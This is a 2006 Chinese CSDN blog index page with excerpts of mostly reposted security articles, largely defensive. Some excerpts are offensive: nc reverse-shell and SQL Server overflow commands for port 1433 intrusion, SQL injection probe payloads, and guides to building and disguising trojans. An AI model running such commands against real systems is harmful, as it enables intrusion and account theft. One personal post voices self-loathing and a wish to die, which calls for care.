自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(27)
  • 收藏
  • 关注

原创 Bye!

我不想说我很垃圾,但事实就是那样. 世间绝对不可以找出第二个比我还垃圾的人来,因为我是带着无尽自卑而来,却要带着无限的自信回到现实生活中,对于我来说,那太难了,几乎是我不可能做得到了,事实上也确实是那样,我没有做到,我给了自己无数次的机会,我不想浪费我有限的荷尔蒙了..................................Bye !让这个垃圾去死掉!    

2006-03-30 00:33:00 1008

转载 ADSL防御黑客攻击的十大方法

目前,使用ADSL的用户越来越多,由于ADSL用户在线时间长、速度快,因此成为黑客们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”,要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢?不妨看看以下方法。  一、取消文件夹隐藏共享   如果你使用了Windows 2000/XP系统,右键单击C盘或者其他盘,选择"共享",你会惊奇地发现它已经被设置为“共享该文件夹”,而

2006-03-28 01:02:00 1112

转载 ADSL用户遭遇“聪明”窃贼盗号

近日,读者王先生向记者讲述了自己的ADSL账号被盗消费的经历。让王先生感到郁闷的是,盗号者每月都使用其ADSL账号消费,就像蛀虫一样不断地蚕食自己的荷包。前两天交完电话费后,王先生才惊奇地发现ADSL账号已经被盗3个多月了。   -记者调查事件经过  据了解,王先生家里的ADSL每月49.5元可使用40个小时,属于限时包月,超时需要另外付费。从去年11月份开始,由于工作原因王先生经常在家中上网

2006-03-28 01:01:00 1263

转载 纠正14条查杀计算机病毒的错误认识

网络生活中,计算机病毒给我们带来了具大的威胁,如何防范病毒是我们非常关心的一个话题。其实电脑病毒的防范并不是简单的几个字,在认识上我们有些人就存在很大的错误,下面我们就一起来看看我们面对计算机病毒时的一些错误认识。  1、对染毒软盘DIR操作会导致硬盘被感染(错)  如果计算机的内存没有病毒,那么只有在执行了带有病毒的程序(文件)后,才会感染计算机。而DIR命令是DOS的内部命令,不需要执

2006-03-28 00:59:00 1314

转载 用VB编写最简单木马程序

嘿嘿,今天闲着没事做。想想自己也学了一段时间VB了。想实践一下,嘿嘿。来写个什么东东呢`?...不如就编写个最简单木马吧``HOHO!~相信大家都知道木马的厉害吧~它可以在无形中记录你的键盘输入、截取你的密码;从你的机子中神密地偷走你的重要资料;甚至格掉你的硬盘……那么它是怎么工作的呢?其实原理倒也很简单,它们不外乎也就是基于TCP/IP协议的客户端/服务端程序。工作原理也和普通的客户端/服务端软

2006-03-28 00:57:00 2656

转载 如何防御Sniffer攻击

1.怎样发现 Sniffer Sniffer最大的危险性就是它很难被发现,在单机情况下发现一个Sniffer还是比较容易的,可以通过查看计算机上当前正在运行的所有程序来实现,当然这不一定可靠。 在UNIX系统下可以使用下面的命令:ps-aux。这个命令列出当前的所有进程、启动这些进程的用户、它们占用CPU的时间以及占用多少内存等等。在Windoos系统下,可以按下Ctrl+Alt+Del键,查看任

2006-03-28 00:53:00 1480

转载 关于代码加密解密保护

 文本代码保护是件很头痛的事,随着了解的加深保护的方法越多,也就意味着漏洞越多.   下面说说我的经验,有更好方法的欢迎交流.   [-调取原代码的方法-]   1:右键 - 查看原文件   2:查看 - 原文件   3:文件 - 另存为   4:IE缓存   5:还可以通过代码提取   教程代码:      function add()   {   var ress=document

2006-03-28 00:52:00 955

转载 用IExpress打造“免检”木马

木马传播者最惯用的手段就是将木马程序和合法程序捆绑在一起,欺骗被攻击者。然而,现在杀毒软件对捆绑类软件已显出“咄咄逼人”的态势,几乎所有的捆绑类软件都会被查杀,大大小小的木马纷纷失效。  IExpress小档案  出身:Microsoft  功能:专用于制作各种 CAB 压缩与自解压缩包的工具。  由于是Windows自带的程序,所以制作出来的安装包具有很好的兼容性。它可以帮助木马

2006-03-27 10:15:00 1563

转载 巧妙修改虚拟机的BIOS信息

 出于各种需要,很多朋友都安装了Microsoft Virtual PC或VMware等虚拟机软件,这样可以安全试用各种最新的操作系统和应用软件,不会影响到原有系统的稳定性。   修改Virtual PC虚拟机BIOS   由于Virtual PC已于2003年被微软收购,因此软件与更名为Microsoft Virtual PC,它的优势是内存占用小,与操作系统的兼容性强。通过修改虚拟

2006-03-27 10:13:00 3345

转载 整理搜集最完整清除木马方法

 很多计算机爱好者对安全问题了解不多,特别是计算机中了特洛伊木马不知道怎么样来清除。虽然现在有很多的清除特洛伊木马的软件,可以自动清除木马。但你不知道木马是怎样在计算机中运行的,如果你看了这篇文章之后,你就会明白一些木马的原理。文章里面也有我自己处理木马的一些经验。本资料来部分方法来自网上搜集整理而得,在这供大家研究学习所用……………………………………………………………………………………………

2006-03-27 10:11:00 1618 1

转载 网吧电脑需要注意的五条防护技巧

 不久前,浙江金华市公安局经过4个多月的艰苦侦查,终于摧毁了全国首个利用病毒程序盗取大量网游帐号、密码及“装备”的特大网络黑客团伙。   这就引发了一个许多人不曾考虑过的问题。间谍软件可以很容易地安装到公用计算机上,如网吧、机场、图书馆和其他公共场所的计算机。国内有很多初级的盗窃密码的病毒程序。原理很简单,专门对付没有防备的人。国外类似软件更多,更加隐蔽,类似GoToMyPC这种软件,该软件允许出

2006-03-27 10:09:00 979

转载 菜鸟对付最流行的几种捆绑器

最近不知怎么搞的。一夜就冒出N个捆绑机。害得我等菜鸟苦不堪言。今天就各种捆绑器的原理和检测方法做个简单的总结,以帮助各位识别带毒程序。一、传统的捆绑器。这种原理很简单,也是目前用的最多的一种。就是将B.exe附加到A.exe的末尾。这样当A.exe被执行的时候,B.exe也跟着执行了。这种捆绑器的代码是满网都是。我最早是从jingtao的一篇关于流的文章中得知的。就目前来说,已经没什么技术含量

2006-03-27 10:06:00 1820

转载 透析Svchost进程清除后门

网上有很多关于Svchost.exe的讨论,我们今天首先来看一下Svchost.exe的原理,工作方法,然后结合著名DLL木马,实战了解一下使用Svchost.exe进行启动的木马的清除,希望大家能够有所收获。Svchost.exe是NT核心系统非常重要的文件,对于Windows 2000/XP来说,不可或缺。Svchost进程提供很多系统服务,如:logical disk manager、rem

2006-03-27 10:04:00 2418

转载 建立安全的游戏服务器

系统方面要解决的问题:          1.设置账户的安全策略,提高系统的安全系数。          2.关闭隐藏共享,防止攻击者利用隐藏共享入侵系统。          3.设置正确的账户权限,防止本地提升权限。          4.修补系统的漏洞,保证系统最基本的安全。  设置账户的安全策略  安全系数:★★★★  操作难度:★★          按照正常的步骤安装系统,一般安装到C盘

2006-03-27 10:03:00 1134

转载 与病毒赛跑,系统中毒之后的自救

现在虽然有众多的杀毒软件和防火墙作为电脑的保护网,但由于不可预知病毒的不断更新加上系统的未知漏洞和更隐蔽的黑客入侵,电脑中毒在互联网时代还是不可避免的。万一中毒该 如何处理呢?下面就谈谈中毒后的一些处理措施  一、正在上网的用户,发现异常应立刻断开连接  所谓的异常:  1.机器运行速度明显减慢。  2.打开某网页后无数对话框弹出。  3.花屏以及出现奇怪的消息。  4.鼠

2006-03-27 10:01:00 1290 1

转载 捆绑执行文件新思维

{最新功能:与其它程序捆绑后,图标为其它程序的图标   这个示范程序没有form,编译、压缩后仅40K,运行后不长驻内存   如果加上隐藏的窗体,加上搜索可执行程序的功能,加上监视系统的功能,加上 %$#@*^ 功能...   程序中几个数字的确定:   1 在本程序编译后用Aspack.Exe压缩,大小为41472   2 经过分析,本程序在用Aspack.Exe压缩后,图标前面部分长40751

2006-03-25 13:39:00 829

转载 各种端口的入侵方法

1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破(字典是关键) 最后 SQLTool*.**e入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵i

2006-03-25 13:34:00 1922

转载 全面了解ASP注入方法

>1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user>03.注入参数是字符and [查询条件] and =4.搜索时没过滤参数的and [查询条件] and %25=5.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (select count(*) from msys

2006-03-25 13:32:00 747

翻译 微软确认高危漏洞 正在紧急开发补丁

对于这个可使成千上万的IE浏览器用户受到黑客威胁的高危漏洞,微软计划在网站公布一个提前的安全咨询方案。这份安全建议将在这里公布。这个代码执行漏洞是由丹麦哥本哈根的Secunia网站公布的。     Secunia 在安全公告中描述此漏洞是由应用于单选按钮控制的"createTextRange()"进程呼叫进行中的错误导致的。“这个错误可被操作例如恶意网站在某种程度上导致内存溢出一样,允许程序流

2006-03-25 13:29:00 793

转载 经典sql注入

 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。SQL注入是从正常的WWW端口访

2006-03-25 13:28:00 806

原创 丢了就再也找不回来了!

   今天玩CS打混战,真是到了低谷,不知道能否用这个词来解释我现在的心理状态了,没办法了,根本一次都赢不了,真是感到了痛苦和无奈,真是无法理解,可能这就是我的真实水平吧,呵...  现在真的很难受很难受,说不出的感觉.遇到低谷的人可能都这样吧.我只能猜测.......  忽然想起我qq里加的一个群组里的一句话:高手是被菜出来的! 可这菜的打击未免也太大了些吧....... 革命尚

2006-03-23 23:01:00 1334 2

原创 拒绝巫师

     最近不知道什么原因,总喜欢看关于宇宙的图书,倘若遇到一本电子文档也会立即Save,尽管有90%的电子书我可能永远都不会去看.甚至忘记了什么格式,CHM?EXE?或者DOC.脑袋里想法很多.比方说今天,当我看到Hawking大谈他的Black Holes的时候,才觉得原来我是个标准的文盲,甚至连文盲都算不上.难怪有人说科学离我们很近,也很远.当你在生活中尽情的享受科学发明带来的愉悦时,是不

2006-03-23 19:17:00 891

转载 IE最新漏洞 XP SP2不能幸免

本周一,微软公司表示正在调查一个最新报告给它的IE缺陷。在浏览恶意网页时该缺陷能够造成浏览器崩溃。 上周,安全研究人员Michal Zalewski 在一个安全邮件列表上公布了该缺陷的详细资料。Secunia 在本周一发表的一份报告中说,黑客可以利用该缺陷使IE崩溃。它表示,这一缺陷已经在安装了全部补丁软件运行、IE 6和Windows XP SP2的PC上得到了证实。Secunia

2006-03-23 08:43:00 822

翻译 揭秘加拿大黑客真实生活

 这就是他每天的工作,不到两分钟就可以完成。两周之后,他将收到300美元的支票。     从重重地倒在床上到挣扎着爬起床的6个小时里,这个21岁的黑客已经偷偷地潜入了全球近2000台私人电脑。在他沉睡的时候,他编制的软件在网络上搜索那些容易受攻击的电脑,使它们染上病毒成为“奴隶”。     此刻,他手中正拿着今天点燃的第一根万宝路香烟,烟雾缠绕在他父母砖砌的爬满蔷薇的起居室里。这个在网上以0×80

2006-03-23 08:42:00 2001 1

转载 “社会工程学”主导非传统信息安全

信息安全也需要做到“以人为本”,充分认识到社会工程学威胁非传统信息安全的危害和方式,做到先入为主的教育和培训,技术和管理手段相结合,达成一定程度上的非传统信息安全。      “非传统安全”(Nontraditional Security),这一词见于冷战后西方国际安全与国际关系研究界。冷战后,特别是“9.11事件”发生以后,包括中国在内的世界各国纷纷把由于恐怖主义、能源、经济、文化、信息安全等问

2006-03-22 16:45:00 913

转载 手机病毒雷声大雨点小 至今未造成实质威胁

CNET科技资讯网3月21日国际报道 据市场观察人士称,尽管已经出现了“概念”上能够同时攻击PC和手机的病毒,但商家仍无需对这类手机病毒有过多担心。   手机银行软件开发商Meridea 公司的首席执行官兼总裁Jukka.Riivari 称,病毒需要一个统一的基础平台才能有效感染目标设备。  

2006-03-22 16:31:00 1044

原创 第一天使用CSDN的BLog,心里有紧张.

    以前申请的HackBase的BLog,开始的时候纯粹是为了新鲜,因为大家都在玩Blog嘛,没想到,在HackBase每天写Blog都很准时的,当然了顺便记载了一些真实的情感和一些比较实用的转载文章,每天都登陆上去看看,如果有好的文章,我立即会帖到我的Blog里来.当时感觉很是惬意,但是好景不长,有一天,我象往常一样输入用户名和密码登陆去了HackBase的BLog,忽然发现,属于我的Blo

2006-03-17 15:49:00 945 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除